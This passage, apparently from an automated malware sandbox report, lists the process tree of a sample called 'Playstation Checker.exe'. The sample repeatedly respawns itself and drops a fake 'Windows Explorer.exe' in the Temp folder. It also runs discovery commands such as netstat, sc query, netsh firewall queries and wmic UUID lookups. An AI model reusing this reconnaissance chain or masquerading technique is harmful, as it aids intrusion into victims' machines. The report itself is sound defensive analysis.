        5⤵
        Network Service Discovery
        
        PID:1272
    - - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        5⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:5284
    - - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        5⤵
        Launches sc.exe
        
        PID:6548
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6528
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6884
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:6988
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6680
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:3096
- C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
  "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:8732
- - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
    3⤵
    - Executes dropped EXE
    PID:548
  - - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
      "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
      4⤵
      Executes dropped EXE
      PID:7960
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:8936
- - C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
    "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:7856
  - - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
      "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
      4⤵
      Executes dropped EXE
      PID:8472
    - - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        5⤵
        Executes dropped EXE
        
        PID:5224
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:780
  - - C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
      "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:4996
    - - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        5⤵
        Executes dropped EXE
        
        PID:7776
      - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        6⤵
        Executes dropped EXE
        
        PID:5732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:7744
    - - C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:652
      - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        6⤵
        Executes dropped EXE
        
        PID:6360
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        7⤵
        Executes dropped EXE
        
        PID:4732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:3708
      - C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        6⤵
        Executes dropped EXE
        
        PID:8396
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        7⤵
        Executes dropped EXE
        
        PID:6840
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        8⤵
        Executes dropped EXE
        
        PID:6888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        9⤵
        
        PID:7124
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        8⤵
        Executes dropped EXE
        
        PID:2536
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        9⤵
        Executes dropped EXE
        
        PID:7660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:7372
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:7912
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        9⤵
        Executes dropped EXE
        
        PID:3160
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        10⤵
        Executes dropped EXE
        
        PID:8852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        11⤵
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:8968
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        10⤵
        Executes dropped EXE
        
        PID:8484
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        11⤵
        Executes dropped EXE
        
        PID:7400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:7292
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        10⤵
        Executes dropped EXE
        
        PID:8628
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        11⤵
        Executes dropped EXE
        
        PID:8132
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        12⤵
        Executes dropped EXE
        
        PID:2020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        13⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5124
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        12⤵
        Executes dropped EXE
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        13⤵
        Executes dropped EXE
        
        PID:5132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        14⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4860
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        13⤵
        Executes dropped EXE
        
        PID:8916
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        14⤵
        Executes dropped EXE
        
        PID:8564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        15⤵
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:9124
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        14⤵
        Executes dropped EXE
        
        PID:1552
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        15⤵
        Executes dropped EXE
        
        PID:5780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        16⤵
        
        PID:3304
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:856
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        15⤵
        Executes dropped EXE
        
        PID:8800
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        16⤵
        Executes dropped EXE
        
        PID:8568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        17⤵
        
        PID:5448
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        16⤵
        Executes dropped EXE
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        17⤵
        Executes dropped EXE
        
        PID:6248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        18⤵
        
        PID:6212
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6416
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        17⤵
        Executes dropped EXE
        
        PID:232
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        18⤵
        
        PID:1748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        19⤵
        
        PID:6848
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6620
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        18⤵
        
        PID:7332
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        19⤵
        
        PID:516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        20⤵
        
        PID:7548
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        18⤵
        Checks computer location settings
        
        PID:7396
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        19⤵
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        20⤵
        
        PID:7936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        21⤵
        
        PID:5400
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        19⤵
        Checks computer location settings
        
        PID:5276
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        20⤵
        
        PID:8880
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        21⤵
        
        PID:9132
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        22⤵
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        20⤵
        Checks computer location settings
        
        PID:3652
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        21⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        22⤵
        
        PID:7416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        23⤵
        
        PID:7444
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        21⤵
        Checks computer location settings
        
        PID:7708
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        22⤵
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        23⤵
        
        PID:8940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        24⤵
        
        PID:8196
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        22⤵
        Checks computer location settings
        
        PID:6120
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        23⤵
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        24⤵
        
        PID:2140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        25⤵
        
        PID:4488
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        23⤵
        Checks computer location settings
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        24⤵
        
        PID:7072
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        25⤵
        
        PID:5396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        26⤵
        
        PID:7484
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        24⤵
        Checks computer location settings
        
        PID:7380
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        25⤵
        
        PID:5476
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        26⤵
        
        PID:7316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        27⤵
        
        PID:624
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        25⤵
        Checks computer location settings
        
        PID:8584
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        26⤵
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        27⤵
        
        PID:4484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        28⤵
        
        PID:8844
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        26⤵
        
        PID:7188
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        27⤵
        
        PID:8752
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        28⤵
        
        PID:7144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        29⤵
        
        PID:8556
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        27⤵
        Checks computer location settings
        
        PID:6844
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        28⤵
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        29⤵
        
        PID:5260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        30⤵
        
        PID:5484
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        28⤵
        Checks computer location settings
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        29⤵
        
        PID:3844
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        30⤵
        
        PID:7700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        31⤵
        
        PID:8436
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        29⤵
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        30⤵
        
        PID:6336
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        31⤵
        
        PID:7584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        32⤵
        
        PID:7148
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        30⤵
        Checks computer location settings
        
        PID:8924
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        31⤵
        
        PID:7960
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        32⤵
        
        PID:2564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        33⤵
        
        PID:6100
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        31⤵
        Checks computer location settings
        
        PID:8284
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        32⤵
        
        PID:6392
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        33⤵
        
        PID:1620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        34⤵
        
        PID:8360
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        32⤵
        Checks computer location settings
        
        PID:7764
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        33⤵
        
        PID:5348
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        34⤵
        
        PID:6428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        35⤵
        
        PID:2060
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        33⤵
        Checks computer location settings
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        34⤵
        
        PID:8100
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        35⤵
        
        PID:1136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        36⤵
        
        PID:6328
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        34⤵
        Checks computer location settings
        
        PID:7176
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        35⤵
        
        PID:7452
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        36⤵
        
        PID:852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        37⤵
        
        PID:5240
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        35⤵
        Checks computer location settings
        
        PID:8980
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        36⤵
        
        PID:8628
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        37⤵
        
        PID:348
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        38⤵
        
        PID:7316
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        36⤵
        Checks computer location settings
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        37⤵
        
        PID:5564
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        38⤵
        
        PID:4544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        39⤵
        
        PID:8376
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        37⤵
        Checks computer location settings
        
        PID:7740
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        38⤵
        
        PID:6808
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        39⤵
        
        PID:6776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        40⤵
        
        PID:9000
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        38⤵
        Checks computer location settings
        
        PID:7096
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        39⤵
        
        PID:2536
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        40⤵
        
        PID:7584
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        41⤵
        
        PID:8100
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        39⤵
        Checks computer location settings
        
        PID:1312
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        40⤵
        
        PID:4792
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        41⤵
        
        PID:1420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        42⤵
        
        PID:7816
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        40⤵
        Checks computer location settings
        
        PID:5836
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        41⤵
        
        PID:640
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        42⤵
        
        PID:4996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        43⤵
        
        PID:7780
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        41⤵
        Checks computer location settings
        
        PID:9180
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        42⤵
        
        PID:6368
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        43⤵
        
        PID:7312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        44⤵
        
        PID:6204
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        42⤵
        
        PID:7260
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        43⤵
        
        PID:9024
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        44⤵
        
        PID:8892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        45⤵
        
        PID:6432
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        43⤵
        
        PID:5212
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        44⤵
        
        PID:4864
        
        C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
        45⤵
        
        PID:5732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        46⤵
        
        PID:6060
        
        C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Playstation Checker.exe"
        44⤵
        
        PID:5492
        
